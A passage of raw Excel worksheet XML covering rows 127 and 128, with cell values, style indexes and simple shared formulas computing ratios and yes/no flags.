      <c r="GP127" s="113" t="str">
        <f t="shared" si="201"/>
        <v>-</v>
      </c>
      <c r="GQ127" s="170" t="s">
        <v>12</v>
      </c>
      <c r="GR127" s="170" t="s">
        <v>12</v>
      </c>
      <c r="GS127" s="142" t="s">
        <v>225</v>
      </c>
      <c r="GT127" s="94" t="s">
        <v>2176</v>
      </c>
      <c r="GU127" s="116" t="s">
        <v>2091</v>
      </c>
      <c r="GV127" s="116">
        <v>6.0</v>
      </c>
      <c r="GW127" s="116">
        <v>6.0</v>
      </c>
      <c r="GX127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD127" s="131" t="s">
        <v>2091</v>
      </c>
      <c r="HE127" s="131" t="s">
        <v>2091</v>
      </c>
      <c r="HF127" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG127" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH127" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI127" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ127" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK127" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL127" s="93">
        <v>385.0</v>
      </c>
      <c r="HM127" s="93">
        <f t="shared" si="83"/>
        <v>6</v>
      </c>
      <c r="HN127" s="93">
        <v>6.0</v>
      </c>
      <c r="HO127" s="93">
        <v>0.0</v>
      </c>
      <c r="HP127" s="93">
        <v>6.0</v>
      </c>
      <c r="HQ127" s="118">
        <f t="shared" si="53"/>
        <v>0.01558441558</v>
      </c>
      <c r="HR127" s="118">
        <f t="shared" si="54"/>
        <v>0.01558441558</v>
      </c>
      <c r="HS127" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT127" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU127" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV127" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW127" s="119">
        <v>1.0</v>
      </c>
      <c r="HX127" s="119">
        <v>4530.0</v>
      </c>
      <c r="HY127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID127" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE127" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH127" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II127" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ127" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK127" s="99">
        <v>385.0</v>
      </c>
      <c r="IL127" s="99">
        <v>385.0</v>
      </c>
      <c r="IM127" s="121">
        <f t="shared" si="159"/>
        <v>385</v>
      </c>
      <c r="IN127" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO127" s="98">
        <v>385.0</v>
      </c>
      <c r="IP127" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ127" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR127" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS127" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT127" s="127"/>
      <c r="IU127" s="127"/>
      <c r="IV127" s="127"/>
      <c r="IW127" s="127"/>
      <c r="IX127" s="127"/>
      <c r="IY127" s="127"/>
      <c r="IZ127" s="127"/>
      <c r="JA127" s="127"/>
      <c r="JB127" s="127"/>
      <c r="JC127" s="127"/>
      <c r="JD127" s="127"/>
      <c r="JE127" s="127"/>
      <c r="JF127" s="127"/>
      <c r="JG127" s="127"/>
      <c r="JH127" s="127"/>
      <c r="JI127" s="127"/>
      <c r="JJ127" s="127"/>
      <c r="JK127" s="127"/>
      <c r="JL127" s="127"/>
      <c r="JM127" s="127"/>
      <c r="JN127" s="127"/>
      <c r="JO127" s="127"/>
      <c r="JP127" s="127"/>
      <c r="JQ127" s="127"/>
      <c r="JR127" s="127"/>
      <c r="JS127" s="127"/>
      <c r="JT127" s="127"/>
      <c r="JU127" s="127"/>
      <c r="JV127" s="127"/>
      <c r="JW127" s="127"/>
      <c r="JX127" s="127"/>
      <c r="JY127" s="127"/>
      <c r="JZ127" s="127"/>
      <c r="KA127" s="127"/>
      <c r="KB127" s="127"/>
      <c r="KC127" s="127"/>
      <c r="KD127" s="127"/>
      <c r="KE127" s="127"/>
      <c r="KF127" s="127"/>
      <c r="KG127" s="127"/>
      <c r="KH127" s="127"/>
      <c r="KI127" s="127"/>
      <c r="KJ127" s="127"/>
      <c r="KK127" s="127"/>
      <c r="KL127" s="127"/>
      <c r="KM127" s="127"/>
      <c r="KN127" s="127"/>
      <c r="KO127" s="127"/>
      <c r="KP127" s="127"/>
      <c r="KQ127" s="127"/>
      <c r="KR127" s="127"/>
      <c r="KS127" s="127"/>
      <c r="KT127" s="127"/>
      <c r="KU127" s="127"/>
      <c r="KV127" s="127"/>
      <c r="KW127" s="127"/>
      <c r="KX127" s="127"/>
      <c r="KY127" s="127"/>
      <c r="KZ127" s="127"/>
      <c r="LA127" s="127"/>
      <c r="LB127" s="127"/>
      <c r="LC127" s="127"/>
      <c r="LD127" s="127"/>
      <c r="LE127" s="127"/>
      <c r="LF127" s="127"/>
      <c r="LG127" s="127"/>
      <c r="LH127" s="127"/>
      <c r="LI127" s="127"/>
      <c r="LJ127" s="127"/>
      <c r="LK127" s="127"/>
      <c r="LL127" s="127"/>
      <c r="LM127" s="127"/>
      <c r="LN127" s="127"/>
      <c r="LO127" s="127"/>
      <c r="LP127" s="127"/>
      <c r="LQ127" s="127"/>
      <c r="LR127" s="127"/>
      <c r="LS127" s="127"/>
      <c r="LT127" s="127"/>
      <c r="LU127" s="127"/>
      <c r="LV127" s="127"/>
      <c r="LW127" s="127"/>
      <c r="LX127" s="127"/>
      <c r="LY127" s="127"/>
      <c r="LZ127" s="127"/>
      <c r="MA127" s="127"/>
      <c r="MB127" s="127"/>
      <c r="MC127" s="127"/>
      <c r="MD127" s="127"/>
      <c r="ME127" s="127"/>
      <c r="MF127" s="127"/>
      <c r="MG127" s="127"/>
      <c r="MH127" s="127"/>
      <c r="MI127" s="127"/>
      <c r="MJ127" s="127"/>
      <c r="MK127" s="127"/>
      <c r="ML127" s="127"/>
      <c r="MM127" s="127"/>
      <c r="MN127" s="127"/>
      <c r="MO127" s="127"/>
      <c r="MP127" s="127"/>
      <c r="MQ127" s="127"/>
      <c r="MR127" s="127"/>
      <c r="MS127" s="127"/>
      <c r="MT127" s="127"/>
      <c r="MU127" s="127"/>
      <c r="MV127" s="127"/>
      <c r="MW127" s="127"/>
      <c r="MX127" s="127"/>
      <c r="MY127" s="127"/>
      <c r="MZ127" s="127"/>
      <c r="NA127" s="127"/>
      <c r="NB127" s="127"/>
      <c r="NC127" s="127"/>
      <c r="ND127" s="127"/>
      <c r="NE127" s="127"/>
      <c r="NF127" s="127"/>
      <c r="NG127" s="127"/>
      <c r="NH127" s="127"/>
      <c r="NI127" s="127"/>
      <c r="NJ127" s="127"/>
      <c r="NK127" s="127"/>
      <c r="NL127" s="127"/>
      <c r="NM127" s="127"/>
      <c r="NN127" s="127"/>
      <c r="NO127" s="127"/>
      <c r="NP127" s="127"/>
      <c r="NQ127" s="127"/>
      <c r="NR127" s="127"/>
      <c r="NS127" s="127"/>
      <c r="NT127" s="127"/>
      <c r="NU127" s="127"/>
      <c r="NV127" s="127"/>
      <c r="NW127" s="127"/>
      <c r="NX127" s="127"/>
      <c r="NY127" s="127"/>
    </row>
    <row r="128" ht="153.75" customHeight="1">
      <c r="B128" s="89" t="s">
        <v>2093</v>
      </c>
      <c r="C128" s="91" t="s">
        <v>12</v>
      </c>
      <c r="D128" s="90" t="s">
        <v>2094</v>
      </c>
      <c r="E128" s="91" t="s">
        <v>2177</v>
      </c>
      <c r="F128" s="90" t="s">
        <v>2178</v>
      </c>
      <c r="G128" s="91" t="s">
        <v>2179</v>
      </c>
      <c r="H128" s="90" t="s">
        <v>2180</v>
      </c>
      <c r="I128" s="92" t="s">
        <v>2181</v>
      </c>
      <c r="J128" s="92" t="s">
        <v>2149</v>
      </c>
      <c r="K128" s="92" t="s">
        <v>2182</v>
      </c>
      <c r="L128" s="93" t="s">
        <v>679</v>
      </c>
      <c r="M128" s="93">
        <v>1.0</v>
      </c>
      <c r="N128" s="93">
        <v>1.0</v>
      </c>
      <c r="O128" s="93">
        <v>0.0</v>
      </c>
      <c r="P128" s="93">
        <v>1.0</v>
      </c>
      <c r="Q128" s="93">
        <f t="shared" si="204"/>
        <v>1</v>
      </c>
      <c r="R128" s="93">
        <v>1.0</v>
      </c>
      <c r="S128" s="93">
        <v>0.0</v>
      </c>
      <c r="T128" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U128" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V128" s="96" t="s">
        <v>2183</v>
      </c>
      <c r="W128" s="96" t="s">
        <v>2184</v>
      </c>
      <c r="X128" s="97" t="s">
        <v>2185</v>
      </c>
      <c r="Y128" s="126" t="s">
        <v>2186</v>
      </c>
      <c r="Z128" s="96" t="s">
        <v>2187</v>
      </c>
      <c r="AA128" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB128" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC128" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD128" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE128" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF128" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG128" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH128" s="99" t="s">
        <v>2188</v>
      </c>
      <c r="AI128" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ128" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK128" s="100">
        <v>255.0</v>
      </c>
      <c r="AL128" s="100">
        <v>1.0</v>
      </c>
      <c r="AM128" s="100">
        <v>1.0</v>
      </c>
      <c r="AN128" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO128" s="100">
        <v>255.0</v>
      </c>
      <c r="AP128" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ128" s="100">
        <v>1.0</v>
      </c>
      <c r="AR128" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS128" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT128" s="100" t="str">
        <f t="shared" si="214"/>
        <v>-</v>
      </c>
      <c r="AU128" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV128" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW128" s="100">
        <v>255.0</v>
      </c>
      <c r="AX128" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY128" s="100">
        <v>1.0</v>
      </c>
      <c r="AZ128" s="100">
        <v>1.0</v>
      </c>
      <c r="BA128" s="102">
        <v>1.0</v>
      </c>
      <c r="BB128" s="102">
        <v>0.0</v>
      </c>
      <c r="BC128" s="102">
        <v>0.0</v>
      </c>
      <c r="BD128" s="102">
        <v>1.0</v>
      </c>
      <c r="BE128" s="102">
        <v>1.0</v>
      </c>
      <c r="BF128" s="102">
        <v>0.0</v>
      </c>
      <c r="BG128" s="102">
        <v>1.0</v>
      </c>
      <c r="BH128" s="102">
        <v>1.0</v>
      </c>
      <c r="BI128" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ128" s="102">
        <v>0.0</v>
      </c>
      <c r="BK128" s="102">
        <v>1.0</v>
      </c>
      <c r="BL128" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM128" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN128" s="103">
        <f t="shared" si="169"/>
        <v>1</v>
      </c>
      <c r="BO128" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP128" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ128" s="103">
        <f t="shared" si="172"/>
        <v>1</v>
      </c>
      <c r="BR128" s="103">
        <f t="shared" si="173"/>
        <v>1</v>
      </c>
      <c r="BS128" s="103">
        <f t="shared" si="174"/>
        <v>1</v>
      </c>
      <c r="BT128" s="103">
        <f t="shared" si="175"/>
        <v>1</v>
      </c>
      <c r="BU128" s="103">
        <f t="shared" ref="BU128:BU139" si="217">(BE128+BF128)/(N128+O128)</f>
        <v>1</v>
      </c>
      <c r="BV128" s="103">
        <f t="shared" ref="BV128:BV139" si="218">IF(OR(BN128=0,BN128="-"),0,1)</f>
        <v>1</v>
      </c>
      <c r="BW128" s="104">
        <v>255.0</v>
      </c>
      <c r="BX128" s="104">
        <v>1.0</v>
      </c>
      <c r="BY128" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ128" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA128" s="104">
        <v>255.0</v>
      </c>
      <c r="CB128" s="104">
        <v>1.0</v>
      </c>
      <c r="CC128" s="104">
        <v>1.0</v>
      </c>
      <c r="CD128" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE128" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF128" s="104" t="str">
        <f t="shared" si="215"/>
        <v>-</v>
      </c>
      <c r="CG128" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH128" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI128" s="104">
        <v>255.0</v>
      </c>
      <c r="CJ128" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK128" s="104">
        <v>1.0</v>
      </c>
      <c r="CL128" s="104">
        <v>1.0</v>
      </c>
      <c r="CM128" s="105">
        <v>1.0</v>
      </c>
      <c r="CN128" s="105">
        <v>0.0</v>
      </c>
      <c r="CO128" s="105">
        <v>0.0</v>
      </c>
      <c r="CP128" s="105">
        <v>1.0</v>
      </c>
      <c r="CQ128" s="105">
        <v>0.0</v>
      </c>
      <c r="CR128" s="105">
        <v>1.0</v>
      </c>
      <c r="CS128" s="105">
        <v>1.0</v>
      </c>
      <c r="CT128" s="105">
        <v>0.0</v>
      </c>
      <c r="CU128" s="105">
        <v>1.0</v>
      </c>
      <c r="CV128" s="105">
        <v>1.0</v>
      </c>
      <c r="CW128" s="105">
        <v>0.0</v>
      </c>
      <c r="CX128" s="105">
        <v>0.0</v>
      </c>
      <c r="CY128" s="105">
        <v>1.0</v>
      </c>
      <c r="CZ128" s="105">
        <v>0.0</v>
      </c>
      <c r="DA128" s="105">
        <v>1.0</v>
      </c>
      <c r="DB128" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC128" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD128" s="106">
        <f t="shared" si="178"/>
        <v>1</v>
      </c>
      <c r="DE128" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF128" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG128" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH128" s="106">
        <f t="shared" si="181"/>
        <v>1</v>
      </c>
      <c r="DI128" s="106">
        <f t="shared" si="182"/>
        <v>1</v>
      </c>
      <c r="DJ128" s="106">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="DK128" s="107">
        <f t="shared" ref="DK128:DK139" si="219">(CS128+CT128)/(N128+O128)</f>
        <v>1</v>
      </c>
      <c r="DL128" s="106">
        <f t="shared" ref="DL128:DL139" si="220">IF(AND(OR(DD128=0,DD128="-"),DK128=0),0,1)</f>
        <v>1</v>
      </c>
      <c r="DM128" s="108">
        <v>255.0</v>
      </c>
      <c r="DN128" s="108">
        <v>1.0</v>
      </c>
      <c r="DO128" s="108">
        <v>1.0</v>
      </c>
      <c r="DP128" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ128" s="108">
        <v>255.0</v>
      </c>
      <c r="DR128" s="108">
        <v>1.0</v>
      </c>
      <c r="DS128" s="108">
        <v>1.0</v>
      </c>
      <c r="DT128" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU128" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV128" s="108" t="str">
        <f t="shared" ref="DV128:DV139" si="221">IF(DT128="-",DU128,DT128)</f>
        <v>-</v>
      </c>
      <c r="DW128" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX128" s="166" t="s">
        <v>12</v>
      </c>
      <c r="DY128" s="108">
        <v>255.0</v>
      </c>
      <c r="DZ128" s="166" t="s">
        <v>12</v>
      </c>
      <c r="EA128" s="108">
        <v>1.0</v>
      </c>
      <c r="EB128" s="108">
        <v>1.0</v>
      </c>
      <c r="EC128" s="109">
        <v>1.0</v>
      </c>
      <c r="ED128" s="109">
        <v>0.0</v>
      </c>
      <c r="EE128" s="109">
        <v>0.0</v>
      </c>
      <c r="EF128" s="109">
        <v>1.0</v>
      </c>
      <c r="EG128" s="109">
        <v>0.0</v>
      </c>
      <c r="EH128" s="109">
        <v>1.0</v>
      </c>
      <c r="EI128" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ128" s="109">
        <v>0.0</v>
      </c>
      <c r="EK128" s="109">
        <v>1.0</v>
      </c>
      <c r="EL128" s="109">
        <v>1.0</v>
      </c>
      <c r="EM128" s="109">
        <v>0.0</v>
      </c>
      <c r="EN128" s="109">
        <v>0.0</v>
      </c>
      <c r="EO128" s="109">
        <v>1.0</v>
      </c>
      <c r="EP128" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ128" s="109">
        <v>1.0</v>
      </c>
      <c r="ER128" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES128" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET128" s="110">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="EU128" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV128" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW128" s="110">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="EX128" s="110">
        <f t="shared" si="190"/>
        <v>1</v>
      </c>
      <c r="EY128" s="110">
        <f t="shared" si="191"/>
        <v>1</v>
      </c>
      <c r="EZ128" s="110">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="FA128" s="110">
        <f t="shared" ref="FA128:FA139" si="222">(EI128+EJ128)/(N128+O128)</f>
        <v>1</v>
      </c>
      <c r="FB128" s="110">
        <f t="shared" ref="FB128:FB139" si="223">IF(AND(OR(ET128=0,ET128="-"),FA128=0),0,1)</f>
        <v>1</v>
      </c>
      <c r="FC128" s="111" t="s">
        <v>2189</v>
      </c>
      <c r="FD128" s="111">
        <v>4.0</v>
      </c>
      <c r="FE128" s="111">
        <v>7.0</v>
      </c>
      <c r="FF128" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG128" s="111" t="s">
        <v>2190</v>
      </c>
      <c r="FH128" s="111">
        <v>2.0</v>
      </c>
      <c r="FI128" s="111">
        <v>2.0</v>
      </c>
      <c r="FJ128" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK128" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL128" s="111" t="str">
        <f t="shared" si="216"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM128" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN128" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO128" s="111" t="s">
        <v>2190</v>
      </c>
      <c r="FP128" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ128" s="111">
        <v>2.0</v>
      </c>
      <c r="FR128" s="111">
        <v>2.0</v>
      </c>
      <c r="FS128" s="112">
        <v>1.0</v>
      </c>
      <c r="FT128" s="112">
        <v>1.0</v>
      </c>
      <c r="FU128" s="112">
        <v>3.0</v>
      </c>
      <c r="FV128" s="112">
        <v>1.0</v>
      </c>
      <c r="FW128" s="112">
        <v>5.0</v>
      </c>
      <c r="FX128" s="112">
        <v>3.0</v>
      </c>
      <c r="FY128" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ128" s="112">
        <v>0.0</v>
      </c>
      <c r="GA128" s="112">
        <v>1.0</v>
      </c>
      <c r="GB128" s="112">
        <v>1.0</v>
      </c>
      <c r="GC128" s="112">
        <v>1.0</v>
      </c>
      <c r="GD128" s="112">
        <v>1.0</v>
      </c>
      <c r="GE128" s="112">
        <v>1.0</v>
      </c>
      <c r="GF128" s="112">
        <v>1.0</v>
      </c>
      <c r="GG128" s="112">
        <v>1.0</v>
      </c>
      <c r="GH128" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI128" s="113">
        <f t="shared" si="194"/>
        <v>1</v>
      </c>
      <c r="GJ128" s="113">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="GK128" s="113">
        <f t="shared" si="196"/>
        <v>3</v>
      </c>
      <c r="GL128" s="113">
        <f t="shared" si="197"/>
        <v>1</v>
      </c>
      <c r="GM128" s="113">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="GN128" s="113">
        <f t="shared" si="199"/>
        <v>3</v>
      </c>
      <c r="GO128" s="113">
        <f t="shared" si="200"/>
        <v>1</v>
      </c>
      <c r="GP128" s="113">
        <f t="shared" si="201"/>
        <v>1</v>
      </c>
      <c r="GQ128" s="114">
        <f t="shared" ref="GQ128:GQ139" si="224">(FY128+FZ128)/(N128+O128)</f>
        <v>1</v>
      </c>
      <c r="GR128" s="113">
        <f t="shared" ref="GR128:GR139" si="225">IF(AND(OR(GJ128=0,GJ128="-"),GQ128=0),0,1)</f>
        <v>1</v>
      </c>
      <c r="GS128" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT128" s="94" t="s">
        <v>2191</v>
      </c>
      <c r="GU128" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV128" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW128" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF128" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG128" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH128" s="116">
        <v>10357.0</v>
      </c>
      <c r="HI128" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ128" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK128" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL128" s="93">
        <v>1.0</v>
      </c>
      <c r="HM128" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN128" s="93">
        <v>0.0</v>
      </c>
      <c r="HO128" s="93">
        <v>1.0</v>
      </c>
      <c r="HP128" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ128" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR128" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS128" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT128" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU128" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV128" s="119" t="s">
        <v>2192</v>
      </c>
      <c r="HW128" s="119">
        <v>2.0</v>
      </c>
      <c r="HX128" s="119">
        <v>2.0</v>
      </c>
      <c r="HY128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC128" s="120" t="str">
        <f>HV128</f>
        <v>33337, 35287</v>
      </c>
      <c r="ID128" s="120" t="s">
        <v>2192</v>
      </c>
      <c r="IE128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH128" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II128" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ128" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK128" s="99">
        <v>1.0</v>
      </c>
      <c r="IL128" s="99">
        <v>1.0</v>
      </c>
      <c r="IM128" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN128" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO128" s="98">
        <v>1.0</v>
      </c>
      <c r="IP128" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ128" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR128" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS128" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT128" s="127"/>
      <c r="IU128" s="127"/>
      <c r="IV128" s="127"/>
      <c r="IW128" s="127"/>
      <c r="IX128" s="127"/>
      <c r="IY128" s="127"/>
      <c r="IZ128" s="127"/>
      <c r="JA128" s="127"/>
      <c r="JB128" s="127"/>
      <c r="JC128" s="127"/>
      <c r="JD128" s="127"/>
      <c r="JE128" s="127"/>
      <c r="JF128" s="127"/>
      <c r="JG128" s="127"/>
      <c r="JH128" s="127"/>
      <c r="JI128" s="127"/>
      <c r="JJ128" s="127"/>
      <c r="JK128" s="127"/>
      <c r="JL128" s="127"/>
      <c r="JM128" s="127"/>
      <c r="JN128" s="127"/>
      <c r="JO128" s="127"/>
      <c r="JP128" s="127"/>
      <c r="JQ128" s="127"/>
      <c r="JR128" s="127"/>
      <c r="JS128" s="127"/>
      <c r="JT128" s="127"/>
      <c r="JU128" s="127"/>
      <c r="JV128" s="127"/>
      <c r="JW128" s="127"/>
      <c r="JX128" s="127"/>
      <c r="JY128" s="127"/>
      <c r="JZ128" s="127"/>
      <c r="KA128" s="127"/>
      <c r="KB128" s="127"/>
      <c r="KC128" s="127"/>
      <c r="KD128" s="127"/>
      <c r="KE128" s="127"/>
      <c r="KF128" s="127"/>
      <c r="KG128" s="127"/>
      <c r="KH128" s="127"/>
      <c r="KI128" s="127"/>
      <c r="KJ128" s="127"/>
      <c r="KK128" s="127"/>
      <c r="KL128" s="127"/>
      <c r="KM128" s="127"/>
      <c r="KN128" s="127"/>
      <c r="KO128" s="127"/>
      <c r="KP128" s="127"/>
      <c r="KQ128" s="127"/>
      <c r="KR128" s="127"/>
      <c r="KS128" s="127"/>
      <c r="KT128" s="127"/>
      <c r="KU128" s="127"/>
      <c r="KV128" s="127"/>
      <c r="KW128" s="127"/>
      <c r="KX128" s="127"/>
      <c r="KY128" s="127"/>
      <c r="KZ128" s="127"/>
      <c r="LA128" s="127"/>
      <c r="LB128" s="127"/>
      <c r="LC128" s="127"/>
      <c r="LD128" s="127"/>
      <c r="LE128" s="127"/>
      <c r="LF128" s="127"/>
      <c r="LG128" s="127"/>
      <c r="LH128" s="127"/>
      <c r="LI128" s="127"/>
      <c r="LJ128" s="127"/>
      <c r="LK128" s="127"/>
      <c r="LL128" s="127"/>
      <c r="LM128" s="127"/>
      <c r="LN128" s="127"/>
      <c r="LO128" s="127"/>
      <c r="LP128" s="127"/>
      <c r="LQ128" s="127"/>
      <c r="LR128" s="127"/>
      <c r="LS128" s="127"/>
      <c r="LT128" s="127"/>
      <c r="LU128" s="127"/>
      <c r="LV128" s="127"/>
      <c r="LW128" s="127"/>
      <c r="LX128" s="127"/>
      <c r="LY128" s="127"/>
      <c r="LZ128" s="127"/>
      <c r="MA128" s="127"/>
      <c r="MB128" s="127"/>
      <c r="MC128" s="127"/>
      <c r="MD128" s="127"/>
      <c r="ME128" s="127"/>
      <c r="MF128" s="127"/>
      <c r="MG128" s="127"/>
      <c r="MH128" s="127"/>
      <c r="MI128" s="127"/>
      <c r="MJ128" s="127"/>
      <c r="MK128" s="127"/>
      <c r="ML128" s="127"/>
      <c r="MM128" s="127"/>
      <c r="MN128" s="127"/>
      <c r="MO128" s="127"/>
      <c r="MP128" s="127"/>
      <c r="MQ128" s="127"/>
      <c r="MR128" s="127"/>
      <c r="MS128" s="127"/>
      <c r="MT128" s="127"/>
      <c r="MU128" s="127"/>
      <c r="MV128" s="127"/>
      <c r="MW128" s="127"/>
      <c r="MX128" s="127"/>
      <c r="MY128" s="127"/>
      <c r="MZ128" s="127"/>
      <c r="NA128" s="127"/>
      <c r="NB128" s="127"/>
      <c r="NC128" s="127"/>
      <c r="ND128" s="127"/>
      <c r="NE128" s="127"/>
      <c r="NF128" s="127"/>
      <c r="NG128" s="127"/>
      <c r="NH128" s="127"/>
      <c r="NI128" s="127"/>
